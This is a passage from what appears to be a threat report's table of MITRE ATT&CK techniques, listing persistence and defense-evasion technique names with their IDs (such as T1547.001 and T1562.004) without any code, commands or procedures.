Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry